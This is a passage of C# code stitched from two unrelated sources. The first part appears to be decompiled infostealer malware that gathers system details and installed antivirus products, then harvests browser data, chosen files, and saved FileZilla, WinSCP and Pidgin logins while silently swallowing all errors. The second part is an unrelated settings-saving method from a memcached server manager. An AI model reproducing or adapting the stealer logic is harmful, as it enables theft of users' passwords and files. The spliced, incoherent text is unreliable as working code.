credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware()
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = string.Format("{0}", (object)x.NumberOfCores)
})).ToList <Hardware>();
}
catch
{
}
try
{
if (credentials.Hardwares == null)
{
credentials.Hardwares = (IList <Hardware>) new List <Hardware>();
}
foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware()
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = string.Format("{0}", (object)x.AdapterRAM)
})).ToList <Hardware>())
{
credentials.Hardwares.Add(hardware);
}
}
catch
{
}
try
{
List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>()
{
(WmiQueryBase) new WmiAntivirusQuery(),
(WmiQueryBase) new WmiAntiSpyWareQuery(),
(WmiQueryBase) new WmiFirewallQuery()
};
string[] strArray = new string[2]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> source = new List <WmiAntivirus>();
foreach (WmiQueryBase wmiQuery in wmiQueryBaseList)
{
foreach (string scope in strArray)
{
try
{
source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
}
catch
{
}
}
}
credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>();
}
catch
{
}
credentials.InstalledBrowsers = (IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers();
credentials.Processes = (IList <string>)UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms();
credentials.Languages = (IList <string>)UserInfoHelper.AvailableLanguages();
if (settings.GrabBrowsers)
{
List <Browser> browserList = new List <Browser>();
browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers());
browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers());
browserList.Add(EdgeEngine.ParseBrowsers());
foreach (Browser browser in browserList)
{
if (!browser.IsEmpty())
{
credentials.Browsers.Add(browser);
}
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths);
}
if (settings.GrabFTP)
{
List <LoginPair> loginPairList = new List <LoginPair>();
loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections());
loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections());
credentials.FtpConnections = (IList <LoginPair>)loginPairList;
}
if (settings.GrabImClients)
{
foreach (LoginPair connection in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(connection);
}
}
}
catch
{
}
return(credentials);
}
private void SaveChanges()
{
Cursor = Cursors.WaitCursor;
try
{
SetStatusLabel("Checking server name.");
if (IsUserAccountInfomationValid() == false)
{
return;
}
if (IsServerNameAcceptable() == false)
{
return;
}
if (DoesServerNameAlreadyExistInList() == true)
{
return;
}
string userName = null;
string password = null;
if (chkUseImpersonation.Checked == true)
{
userName = txtUserName.Text;
password = txtPassword.Text;
}
SetStatusLabel("Checking connection and authorization.");
// Test the credentials.
try
{
WmiService.GetAllServices(txtServerName.Text, userName, password, "PathName LIKE '%memcached%'");
}
catch (Exception ex)
{
MessageBox.Show("Couldn't connect to the server. Please check server connectivity and user name and password.\n" + ex.Message);
return;
}
if (_server == null)
{
_server = new MemCacheDManager.Business.Server();
ServerConfiguration.Servers.Add(_server);
}
_server.ServerName = txtServerName.Text;
_server.UserName = txtUserName.Text;
_server.Password = Encryption.Encrypt(txtPassword.Text);
_server.UseImpersonation = chkUseImpersonation.Checked;
_server.BinaryPath = txtBinaryPath.Text;
SetStatusLabel("Checking for MemCacheD instances.");
_server.ReadInstancesFromServer();
SetStatusLabel("Saving.");
ServerConfiguration.Save(Configuration.Default.LastConfigFile);
btnApply.Enabled = false;
btnCancel.Enabled = false;
btnAddInstance.Enabled = true;
SetStatusLabel("Updating UI.");
if (Save != null)
{
Save(this._server);
}
}
finally
{
Cursor = Cursors.Default;
SetStatusLabel("Ready.");
}
}
